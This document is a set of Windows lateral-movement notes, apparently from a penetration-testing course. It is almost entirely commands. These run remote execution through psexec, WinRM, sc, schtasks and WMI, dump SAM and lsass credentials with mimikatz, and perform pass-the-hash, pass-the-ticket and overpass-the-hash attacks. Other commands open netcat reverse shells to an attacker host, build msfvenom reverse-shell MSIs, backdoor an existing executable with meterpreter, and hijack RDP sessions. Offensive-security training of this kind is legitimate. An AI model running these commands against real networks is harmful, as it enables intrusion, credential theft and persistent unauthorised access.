7.4 KiB
Lateral Movement
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Finding credentials with more permissions move through the network cloaked, avoiding detection
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Context of connections from A to B with permission C might be suspicious, therefore some bypass has to be found
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Local and network/domain accounts have to be distinguished. UAC is enforced on local admin accounts and not on domain accounts
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Service executables need their own special reverse shell,
msfvenom
file formatexe-service
Remote Processes
psexec
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Port
445
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SMB
protocol -
Group membership:
Administrators
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Upload the service binary to
ADMIN$
directory of the SMB server -
Use
psexesvc.exe
via service control manager to execute the remote process -
Communication will be established through a named pipe
psexec64.exe \\%TARGET_IP% -u Administrator -p %PASSWORD% -i cmd.exe
WinRM
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Ports
5985
(HTTP) and5986
(HTTPS) -
Group Membership:
Remote Management Users
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Execute powershell commands on remote targets
winrs.exe -u:Administrator -p:%PASSWORD% -r:target cmd
- Run through powershell alternatively via
$username = "Administrator";
$password = "SecurePassword";
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
Enter-PSSession -Computername TARGET -Credential $credential
Invoke-Command -Computername TARGET -Credential -ScriptBlock {whoami}
sc
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Ports
135
,49152-65535
(DCE/RPC),135
shows service endpoints on the high ports -
Ports
139
and445
RPC over SMB named pipes, if SVCCTL fails over135
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Group Membership:
Administrators
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Create service remotely via Service Control Manager (RPC) or
SVCCTL
sc.exe \\%TARGET_IP% create MyService binPath= "net user newuser securepassword /add" start= auto
sc.exe \\%TARGET_IP% start MyService
sc.exe \\%TARGET_IP% stop MyService
sc.exe \\%TARGET_IP% delete MyService
schtasks
- Create remote scheduled tasks
schtasks /s TARGET /RU "SYSTEM" /create /tn "SteamUpdateService" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00
schtasks /s TARGET /run /TN "SteamUpdateService"
- Delete scheduled tasks via
schtasks /S TARGET /TN "SteamUpdateService" /DELETE /F
wmi
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Ports are
- DCOM
135
RPC and dynamic ports - Wsman
5985
winrm HTTP and5986
winrm HTTPS
- DCOM
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Group membership:
Administrators
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To start, use the same object used for winrm
$username = "Administrator";
$password = "SecurePassword";
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
- Store the session
$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop
- Spawn a remote process
$Command = "powershell.exe -Command Set-Content -Path C:\payload.txt -Value itworked";
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
CommandLine = $Command
}
- Alternatively via
wmic.exe /user:Administrator /password:securepassword /node:TARGET process call create "cmd.exe /c nc64.exe -e cmd.exe %ATTACKER_IP% %ATTACKER_PORT%"
- Spawn a remote service
Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
Name = "SteamUpdateService";
DisplayName = "SteamUpdateService";
PathName = "net user gabenewell securepassword /add";
ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process
StartMode = "Manual"
}
- Initiate the service
$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'SteamUpdateService'"
Invoke-CimMethod -InputObject $Service -MethodName StartService
- Start and stop via
Invoke-CimMethod -InputObject $Service -MethodName StopService
Invoke-CimMethod -InputObject $Service -MethodName Delete
- Spawn a remote scheduled task
$Command = "cmd.exe"
$Args = "/c net user gabenewell securepassword /add"
$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args
Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "SteamUpdateService"
Start-ScheduledTask -CimSession $Session -TaskName "SteamUpdateService"
- Delete task via
Unregister-ScheduledTask -CimSession $Session -TaskName "SteamUpdateService"
- __ Install a remote msi package__
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$TARGET_IP LPORT=4711 -f msi -o steam.msi
- Upload and run via
Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\steam.msi"; Options = ""; AllUsers = $false}
- Alternatively on older systems via
wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\steam.msi
Further Authentication Methods
- NTLM
- Kerberos
NTLM
Pass the hash
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Retrieve and pass a hash generated from the password
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Use mimikatz on local SAM
privilege::debug
token::elevate
lsadump::sam
* Use mimikatz on lsass
privilege::debug
token::elevate
sekurlsa::msv
* Open reverse shell via mimikatz
token::revert
sekurlsa::pth /user:<username>
/domain:<domainname> /ntlm:<hash> /run:"C:\Windows\temp\nc.exe -e cmd.exe %ATTACKER_IP% 4711"
- Via RDP
xfreerdp /v:$TARGET_IP /u:DOMAIN\\<username> /pth:<ntlm-hash>
- Via psexec
psexec.py -hashes <ntlm-hash> DOMAIN/<username>@%TARGET_IP%
- Kerberos
evil-winrm -i $TARGET_IP -u <username> -H <ntlm-hash>
Kerberos
- Ticket and session key are needed
Pass The Ticket
- Extract via mimikatz
privilege::debug
sekurlsa::tickets /export
- TGS need low privilege account, TGT need administrative privileges
- Use the ticket to inject into a current session
kerberos::ptt <ticket>@<domain>.kirbi
- Check tickets via
klist
Overpass The Hash
- Pass the key: Timestamp to gain TGT is encrypted via an encrypted key
- Algorithms can be
rc4
,aes128
,aes256
ordes
if enabled rc4
is a pure ntml hash
- Algorithms can be
- Use the key to gain the TGT
privilege::debug
sekurlsa::ekeys
- Open a reverse shell via
sekurlsa::pth /user:Administrator /domain:<domain> /<hash-algorithm>:<hash> /run:"C:\Windows\Temp\nc.exe -e cmd.exe %ATTACKER_IP% 4711"
Writeable Shares
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Find a shortcut, a script or anything that keeps a connection over the network to a share
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Reuse a
*.vbs
via
CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\%TARGET_IP%\share\nc.exe %tmp% & %tmp%\nc.exe -e cmd.exe %ATTACKER_IP% 4711", 0, True
- Reuse and inject into exisiting portable executable
msfvenom -a x64 --platform windows -x <reused.exe> -k -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -b "\x00" -f exe -o <new_reused.exe>
- Reuse RDP session. Administrator can be logged out but did not close the session. Reuse it without a password as administrator user. Therefore run
cmd
orpowershell
as administrator and reuse the session by its name
PsExec64.exe -s cmd.exe
query user
- Check output and fill in
tscon <ID-of-target> /dest:<my-SESSIONNAME>
- Session state should be
DISC
, a session which was not exited correctly - Windows Server < 2019 only without the password